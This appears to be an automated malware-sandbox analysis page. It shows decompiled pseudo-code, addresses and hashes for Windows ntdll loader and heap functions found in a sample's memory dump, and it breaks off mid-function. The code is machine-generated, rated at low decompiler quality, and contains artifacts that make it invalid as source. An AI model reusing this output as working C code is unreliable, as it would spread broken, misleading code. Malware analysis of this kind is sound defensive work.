                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-3589223738
                                                                            • Opcode ID: 785b5fdeefe92532d0c95f45562812c4d6b35c03c5733a028b8546e07527f500
                                                                            • Instruction ID: 92fb5f25714077d14a7ef4b7acd7c39366007c329a021ba9c97ce5a205ac80f2
                                                                            • Opcode Fuzzy Hash: 785b5fdeefe92532d0c95f45562812c4d6b35c03c5733a028b8546e07527f500
                                                                            • Instruction Fuzzy Hash: 8A514435A00355DFCB04DBA8CCD8BEC77B6AB44364F050165E551AF2A5CB70BC40C782
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7FD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E1D7FD6D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t68;
				intOrPtr _t70;
				signed int _t78;
				signed char _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				intOrPtr _t97;
				char _t99;
				signed int _t102;
				signed int _t103;
				signed char _t106;
				signed int _t108;
				signed int _t112;
				intOrPtr _t119;
				intOrPtr _t121;
				intOrPtr _t122;
				intOrPtr _t127;
				intOrPtr _t129;
				intOrPtr _t134;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t143;

				_push(0x68);
				_push(0x1d8ac5e8);
				_t68 = E1D827BE4(__ebx, __edi, __esi);
				_t127 =  *[fs:0x18];
				_t97 =  *((intOrPtr*)(_t127 + 0x30));
				if( *0x1d8c5da8 != 0) {
					L19:
					 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
					return _t68;
				}
				_t102 =  *(_t97 + 0x10);
				 *((intOrPtr*)(_t141 - 0x30)) =  *((intOrPtr*)(_t102 + 0x40));
				_t70 =  *((intOrPtr*)(_t102 + 0x44));
				 *((intOrPtr*)(_t141 - 0x2c)) = _t70;
				_t103 =  *(_t97 + 0x10);
				if(( *(_t103 + 8) & 0x00000001) == 0) {
					 *((intOrPtr*)(_t141 - 0x2c)) = _t70 + _t103;
				}
				if(( *0x1d8c37c0 & 0x00000005) != 0) {
					_push(_t141 - 0x30);
					E1D84E692("minkernel\\ntdll\\ldrinit.c", 0x17f5, "LdrShutdownProcess", 2, "Process 0x%p (%wZ) exiting\n",  *((intOrPtr*)(_t127 + 0x20)));
					_t143 = _t143 + 0x1c;
				}
				_t74 =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d8c5dac =  *((intOrPtr*)(_t127 + 0x24));
				 *0x1d8c5da8 = 1;
				if( *0x1d8c65f0 != 0) {
					_t137 =  *0x1d8c91f8; // 0x0
					asm("ror esi, cl");
					_t138 = _t137 ^  *0x7ffe0330;
					_t103 = _t138;
					 *0x1d8c91e0(0x20);
					_t74 =  *_t138();
				}
				_t118 =  *((intOrPtr*)(_t127 + 0xfb4));
				if( *((intOrPtr*)(_t127 + 0xfb4)) != 0) {
					_push(1);
					E1D7D4779(_t74, _t118);
				}
				if(( *0x1d8c391c & 0x00000002) == 0) {
					_t78 =  *(_t97 + 0x10);
					__eflags =  *(_t78 + 8) & 0x40000000;
					_t106 = _t103 & 0xffffff00 | ( *(_t78 + 8) & 0x40000000) == 0x00000000;
					__eflags =  *0x1d8c9234 & 0x00000001;
					_t79 = _t78 & 0xffffff00 | ( *0x1d8c9234 & 0x00000001) == 0x00000000;
					__eflags = _t79 & _t106;
					if((_t79 & _t106) == 0) {
						goto L7;
					}
					 *((char*)(_t141 - 0x19)) = 1;
					_t99 = 0;
					L15:
					_t85 =  *[fs:0x30];
					__eflags =  *0x1d8c68c8;
					if( *0x1d8c68c8 != 0) {
						__eflags =  *((intOrPtr*)(_t85 + 0x18)) - _t99;
						if( *((intOrPtr*)(_t85 + 0x18)) != _t99) {
							E1D850FC8();
							 *0x1d8c68c8 = _t99;
						}
					}
					__eflags =  *((char*)(_t141 - 0x19));
					if( *((char*)(_t141 - 0x19)) == 0) {
						E1D7FD8F0();
					}
					_t68 = E1D7FD898();
					goto L19;
				}
				L7:
				_t99 = 0;
				 *((char*)(_t141 - 0x19)) = 0;
				_t129 =  *0x1d8c5da0; // 0x19584f8
				L8:
				if(_t129 != 0x1d8c5d9c) {
					_t18 = _t129 - 0x10; // 0x19584e8
					_t122 = _t18;
					 *((intOrPtr*)(_t141 - 0x24)) = _t122;
					_t20 = _t129 + 4; // 0x1956fa8
					_t129 =  *_t20;
					 *((intOrPtr*)(_t141 - 0x20)) = _t129;
					_t22 = _t122 + 0x1c; // 0x6cf59bf0
					_t88 =  *_t22;
					 *((intOrPtr*)(_t141 - 0x28)) = _t88;
					if(_t88 != 0 && ( *(_t122 + 0x34) & 0x00080000) != 0) {
						 *((intOrPtr*)(_t141 - 0x54)) = 0x24;
						 *((intOrPtr*)(_t141 - 0x50)) = 1;
						_t112 = 7;
						memset(_t141 - 0x4c, 0, _t112 << 2);
						_t143 = _t143 + 0xc;
						_t31 = _t122 + 0x48; // 0x0
						E1D7EDC40(_t141 - 0x54,  *_t31);
						 *((intOrPtr*)(_t141 - 4)) = _t99;
						_t134 =  *((intOrPtr*)(_t141 - 0x24));
						_t157 =  *((intOrPtr*)(_t134 + 0x3a)) - _t99;
						if( *((intOrPtr*)(_t134 + 0x3a)) != _t99) {
							E1D7EF0A3(_t99, 0, _t134, _t134, 1, __eflags);
						}
						_push(1);
						_push(_t99);
						E1D7EDCD1(_t99,  *((intOrPtr*)(_t141 - 0x28)),  *((intOrPtr*)(_t134 + 0x18)), _t134, 1, _t157);
						 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
						_t129 =  *((intOrPtr*)(_t141 - 0x20));
						E1D7FD886();
					}
					goto L8;
				}
				_t119 =  *0x1d8c5b24; // 0x1932c18
				__eflags =  *((intOrPtr*)(_t119 + 0x3a)) - _t99;
				if( *((intOrPtr*)(_t119 + 0x3a)) != _t99) {
					 *((intOrPtr*)(_t141 - 0x78)) = 0x24;
					 *((intOrPtr*)(_t141 - 0x74)) = 1;
					_t108 = 7;
					memset(_t141 - 0x70, 0, _t108 << 2);
					_t47 = _t119 + 0x48; // 0x0
					E1D7EDC40(_t141 - 0x78,  *_t47);
					 *((intOrPtr*)(_t141 - 4)) = 1;
					_t121 =  *0x1d8c5b24; // 0x1932c18
					E1D7EF0A3(_t99, 0, _t121, _t141 - 0x70 + _t108, 1, __eflags);
					 *((intOrPtr*)(_t141 - 4)) = 0xfffffffe;
					E1D7FD88F();
				}
				goto L15;
			}


























                                                                            0x1d7fd6d0
                                                                            0x1d7fd6d2
                                                                            0x1d7fd6d7
                                                                            0x1d7fd6dc
                                                                            0x1d7fd6e3
                                                                            0x1d7fd6ed
                                                                            0x1d7fd810
                                                                            0x1d7fd813
                                                                            0x1d7fd81f
                                                                            0x1d7fd81f
                                                                            0x1d7fd6f3
                                                                            0x1d7fd6f9
                                                                            0x1d7fd6fc
                                                                            0x1d7fd6ff
                                                                            0x1d7fd702
                                                                            0x1d7fd709
                                                                            0x1d83f0c2
                                                                            0x1d83f0c2
                                                                            0x1d7fd716
                                                                            0x1d83f0cd
                                                                            0x1d83f0e7
                                                                            0x1d83f0ec
                                                                            0x1d83f0ec
                                                                            0x1d7fd71c
                                                                            0x1d7fd71f
                                                                            0x1d7fd724
                                                                            0x1d7fd732
                                                                            0x1d7fd86d
                                                                            0x1d7fd873
                                                                            0x1d7fd875
                                                                            0x1d7fd877
                                                                            0x1d7fd879
                                                                            0x1d7fd87f
                                                                            0x1d7fd87f
                                                                            0x1d7fd738
                                                                            0x1d7fd740
                                                                            0x1d7fd742
                                                                            0x1d7fd744
                                                                            0x1d7fd744
                                                                            0x1d7fd750
                                                                            0x1d83f0f4
                                                                            0x1d83f0f7
                                                                            0x1d83f0fe
                                                                            0x1d83f101
                                                                            0x1d83f108
                                                                            0x1d83f10b
                                                                            0x1d83f10d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83f113
                                                                            0x1d83f117
                                                                            0x1d7fd7ed
                                                                            0x1d7fd7ed
                                                                            0x1d7fd7f3
                                                                            0x1d7fd7fa
                                                                            0x1d83f13c
                                                                            0x1d83f13f
                                                                            0x1d83f145
                                                                            0x1d83f14a
                                                                            0x1d83f14a
                                                                            0x1d83f13f
                                                                            0x1d7fd800
                                                                            0x1d7fd804
                                                                            0x1d7fd806
                                                                            0x1d7fd806
                                                                            0x1d7fd80b
                                                                            0x00000000
                                                                            0x1d7fd80b
                                                                            0x1d7fd756
                                                                            0x1d7fd756
                                                                            0x1d7fd75a
                                                                            0x1d7fd75d
                                                                            0x1d7fd766
                                                                            0x1d7fd76c
                                                                            0x1d7fd76e
                                                                            0x1d7fd76e
                                                                            0x1d7fd771
                                                                            0x1d7fd774
                                                                            0x1d7fd774
                                                                            0x1d7fd777
                                                                            0x1d7fd77a
                                                                            0x1d7fd77a
                                                                            0x1d7fd77d
                                                                            0x1d7fd782
                                                                            0x1d7fd78d
                                                                            0x1d7fd794
                                                                            0x1d7fd799
                                                                            0x1d7fd79f
                                                                            0x1d7fd79f
                                                                            0x1d7fd7a1
                                                                            0x1d7fd7a7
                                                                            0x1d7fd7ac
                                                                            0x1d7fd7af
                                                                            0x1d7fd7b2
                                                                            0x1d7fd7b6
                                                                            0x1d7fd7da
                                                                            0x1d7fd7da
                                                                            0x1d7fd7b8
                                                                            0x1d7fd7b9
                                                                            0x1d7fd7c0
                                                                            0x1d7fd7c5
                                                                            0x1d7fd7cc
                                                                            0x1d7fd7cf
                                                                            0x1d7fd7cf
                                                                            0x00000000
                                                                            0x1d7fd782
                                                                            0x1d7fd7e1
                                                                            0x1d7fd7e7
                                                                            0x1d7fd7eb
                                                                            0x1d7fd820
                                                                            0x1d7fd827
                                                                            0x1d7fd82c
                                                                            0x1d7fd832
                                                                            0x1d7fd834
                                                                            0x1d7fd83a
                                                                            0x1d7fd83f
                                                                            0x1d7fd842
                                                                            0x1d7fd84a
                                                                            0x1d7fd84f
                                                                            0x1d7fd856
                                                                            0x1d7fd856
                                                                            0x00000000

                                                                            APIs
                                                                            • RtlDebugPrintTimes.NTDLL ref: 1D7FD879
                                                                              • Part of subcall function 1D7D4779: RtlDebugPrintTimes.NTDLL ref: 1D7D4817
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                            • API String ID: 3446177414-1975516107
                                                                            • Opcode ID: 6aef74f476b6c26e18e982aca7c1cca2fe183654b3b90856ce11e703c1b873a1
                                                                            • Instruction ID: 8a72cbcae321140423825cb1168d1567c14dc21e905b0144bc3e1d841816d368
                                                                            • Opcode Fuzzy Hash: 6aef74f476b6c26e18e982aca7c1cca2fe183654b3b90856ce11e703c1b873a1
                                                                            • Instruction Fuzzy Hash: 6A512475A08355DFCB24CFA8C4887DDBBF1BF08324F15815AD5646B391D770A942CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7FDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 19%
                                                                            			E1D7FDA20(void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t44;
				char* _t45;
				void* _t65;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t74;
				void* _t82;
				signed char* _t87;
				signed char _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr* _t94;
				signed int* _t95;

				_t93 = _a4;
				if( *((intOrPtr*)(_t93 + 8)) == 0xddeeddee) {
					E1D899335(_t93, 0, __ecx);
					L6:
					_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t44 != 0) {
						if( *_t44 == 0) {
							goto L7;
						}
						_t45 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L8:
						if( *_t45 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D88F717(_t93);
							}
						}
						return 1;
					}
					L7:
					_t45 = 0x7ffe0380;
					goto L8;
				}
				if(( *(_t93 + 0x44) & 0x01000000) != 0) {
					_t94 =  *0x1d8c376c; // 0x0
					 *0x1d8c91e0(_t93);
					return  *_t94();
				}
				if( *((intOrPtr*)(_t93 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D7CB910("Invalid heap signature for heap at %p", _t93);
					E1D7CB910(", passed to %s", "RtlUnlockHeap");
					_push("\n");
					E1D7CB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8c47a1 = 1;
						asm("int3");
						 *0x1d8c47a1 = 0;
					}
					return 0;
				}
				if(( *(_t93 + 0x40) & 0x00000001) != 0) {
					goto L6;
				}
				_t92 =  *((intOrPtr*)(_t93 + 0xc8));
				 *((intOrPtr*)(_t93 + 0xe8)) =  *((intOrPtr*)(_t93 + 0xe8)) + 0xffff;
				_t13 = _t92 + 8;
				 *_t13 =  *((intOrPtr*)(_t92 + 8)) - 1;
				if( *_t13 != 0) {
					goto L6;
				}
				 *(_t92 + 0xc) =  *(_t92 + 0xc) & 0x00000000;
				_t87 = _t92 + 4;
				_t65 = 0xfffffffe;
				asm("lock cmpxchg [edx], ecx");
				_v12 = 0xffff;
				if(_t65 != 0xfffffffe) {
					if(( *_t87 & 0x00000001) != 0) {
						E1D86AA40(_t92);
					}
					_t72 =  *((intOrPtr*)(_t92 + 0x10));
					_v8 = _t72;
					if(_t72 == 0) {
						_v8 = E1D7FFEC0(_t92);
					}
					_v16 = _v16 & 0x00000000;
					_t95 = _t92 + 4;
					_t73 = _v12;
					while(1) {
						_t90 = _t73 & 0x00000002 | 0x00000001;
						_t82 = _t90 + _t73;
						asm("lock cmpxchg [esi], ecx");
						if(_t73 == _t73) {
							break;
						}
						E1D7FBAC0(_t82,  &_v16);
						_t73 =  *_t95;
					}
					_t93 = _a4;
					_t74 = _v8;
					if((_t90 & 0x00000002) != 0) {
						E1D7FF300(_t92, _t74);
					}
				}
				goto L6;
			}



















                                                                            0x1d7fda2a
                                                                            0x1d7fda35
                                                                            0x1d83f408
                                                                            0x1d7fda90
                                                                            0x1d7fda96
                                                                            0x1d7fda9b
                                                                            0x1d83f510
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83f51f
                                                                            0x1d7fdaa6
                                                                            0x1d7fdaa9
                                                                            0x1d83f537
                                                                            0x1d83f53f
                                                                            0x1d83f53f
                                                                            0x1d83f537
                                                                            0x00000000
                                                                            0x1d7fdaaf
                                                                            0x1d7fdaa1
                                                                            0x1d7fdaa1
                                                                            0x00000000
                                                                            0x1d7fdaa1
                                                                            0x1d7fda42
                                                                            0x1d83f413
                                                                            0x1d83f41b
                                                                            0x00000000
                                                                            0x1d83f421
                                                                            0x1d7fda4f
                                                                            0x1d83f432
                                                                            0x1d83f451
                                                                            0x1d83f456
                                                                            0x1d83f434
                                                                            0x1d83f449
                                                                            0x1d83f44e
                                                                            0x1d83f462
                                                                            0x1d83f471
                                                                            0x1d83f476
                                                                            0x1d83f47b
                                                                            0x1d83f48d
                                                                            0x1d83f48f
                                                                            0x1d83f496
                                                                            0x1d83f497
                                                                            0x1d83f497
                                                                            0x00000000
                                                                            0x1d83f49e
                                                                            0x1d7fda59
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7fda5b
                                                                            0x1d7fda66
                                                                            0x1d7fda6d
                                                                            0x1d7fda6d
                                                                            0x1d7fda71
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7fda73
                                                                            0x1d7fda77
                                                                            0x1d7fda7f
                                                                            0x1d7fda80
                                                                            0x1d7fda84
                                                                            0x1d7fda8a
                                                                            0x1d83f4a8
                                                                            0x1d83f4ab
                                                                            0x1d83f4ab
                                                                            0x1d83f4b0
                                                                            0x1d83f4b3
                                                                            0x1d83f4b8
                                                                            0x1d83f4c1
                                                                            0x1d83f4c1
                                                                            0x1d83f4c4
                                                                            0x1d83f4c8
                                                                            0x1d83f4cb
                                                                            0x1d83f4ce
                                                                            0x1d83f4d5
                                                                            0x1d83f4d8
                                                                            0x1d83f4db
                                                                            0x1d83f4e1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83f4e7
                                                                            0x1d83f4ec
                                                                            0x1d83f4ec
                                                                            0x1d83f4f0
                                                                            0x1d83f4f3
                                                                            0x1d83f4f9
                                                                            0x1d83f503
                                                                            0x1d83f503
                                                                            0x1d83f4f9
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                            • API String ID: 3446177414-3224558752
                                                                            • Opcode ID: de613d7c1fc806a3de9b7099b3f83cce2e4397649a2f6f11d76749917622f9d3
                                                                            • Instruction ID: 153b6b1d5fd3aae4f327d5769b48aca5f0376d8ffde268835db1b8410ab7667d
                                                                            • Opcode Fuzzy Hash: de613d7c1fc806a3de9b7099b3f83cce2e4397649a2f6f11d76749917622f9d3
                                                                            • Instruction Fuzzy Hash: D9411632A08645EFC712DF28C884BAAB3A4FF44735F048569E56A87391C738E980D7D7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D87ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • Entry Heap Size , xrefs: 1D87EDED
                                                                            • ---------------------------------------, xrefs: 1D87EDF9
                                                                            • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1D87EDE3
                                                                            • HEAP: , xrefs: 1D87ECDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                            • API String ID: 3446177414-1102453626
                                                                            • Opcode ID: f399f9e93f4b97bb163f2eebf992e8d92a95b906bab7ec34c94fdb5df99606c1
                                                                            • Instruction ID: d5bd0e10b4b054f3e17e4f5ede1fe3ef913e4c945cf3a536ddee20aa518c82e6
                                                                            • Opcode Fuzzy Hash: f399f9e93f4b97bb163f2eebf992e8d92a95b906bab7ec34c94fdb5df99606c1
                                                                            • Instruction Fuzzy Hash: F2418175A00227DFC716CF1DC484AA97BB5FF49354B26846AE4089B360D731FC81CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7FDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 30%
                                                                            			E1D7FDAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E1D899109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D88F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x1d8c3768; // 0x0
					 *0x1d8c91e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D7CB910();
					} else {
						E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D7CB910("Invalid heap signature for heap at %p", _t53);
					E1D7CB910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E1D7CB910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8c47a1 = 1;
						asm("int3");
						 *0x1d8c47a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E1D7DFED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}









                                                                            0x1d7fdac8
                                                                            0x1d7fdacb
                                                                            0x1d7fdad6
                                                                            0x1d83f54e
                                                                            0x1d7fdb0e
                                                                            0x1d7fdb14
                                                                            0x1d7fdb19
                                                                            0x1d83f5ee
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83f5fd
                                                                            0x1d7fdb24
                                                                            0x1d7fdb27
                                                                            0x1d83f614
                                                                            0x1d83f61c
                                                                            0x1d83f61c
                                                                            0x1d83f614
                                                                            0x1d7fdb2d
                                                                            0x1d7fdb2f
                                                                            0x1d7fdb31
                                                                            0x1d7fdb31
                                                                            0x1d7fdb1f
                                                                            0x1d7fdb1f
                                                                            0x00000000
                                                                            0x1d7fdb1f
                                                                            0x1d7fdae3
                                                                            0x1d83f559
                                                                            0x1d83f561
                                                                            0x1d83f567
                                                                            0x00000000
                                                                            0x1d83f567
                                                                            0x1d7fdaf0
                                                                            0x1d83f578
                                                                            0x1d83f597
                                                                            0x1d83f59c
                                                                            0x1d83f57a
                                                                            0x1d83f58f
                                                                            0x1d83f594
                                                                            0x1d83f5a8
                                                                            0x1d83f5b7
                                                                            0x1d83f5bc
                                                                            0x1d83f5c1
                                                                            0x1d83f5d3
                                                                            0x1d83f5d5
                                                                            0x1d83f5dc
                                                                            0x1d83f5dd
                                                                            0x1d83f5dd
                                                                            0x1d83f5e4
                                                                            0x00000000
                                                                            0x1d7fdaf6
                                                                            0x1d7fdafa
                                                                            0x1d7fdb02
                                                                            0x1d7fdb07
                                                                            0x1d7fdb07
                                                                            0x00000000
                                                                            0x1d7fdafa

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                            • API String ID: 3446177414-1222099010
                                                                            • Opcode ID: a9bd257cdc40d71506b7c889b977c80b0b367c924da48ac26fe6f4bdcdf2e559
                                                                            • Instruction ID: bbe61265f4a1a329dd7bbb1c3f8118b64c2a88854babd6061fb0bb3bd1388673
                                                                            • Opcode Fuzzy Hash: a9bd257cdc40d71506b7c889b977c80b0b367c924da48ac26fe6f4bdcdf2e559
                                                                            • Instruction Fuzzy Hash: CB3124361087C4EFD722CF28C808BAA77A8EB05731F058585F46A477A2C779E940C693
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7D9046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 67%
                                                                            			E1D7D9046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x1d8abe98);
				E1D827C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E1D818F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E1D7E9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x1d8c65e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E1D7EA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E1D7F5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E1D7F04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x1d8c65e0; // 0x76fba680
							 *0x1d8c91e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
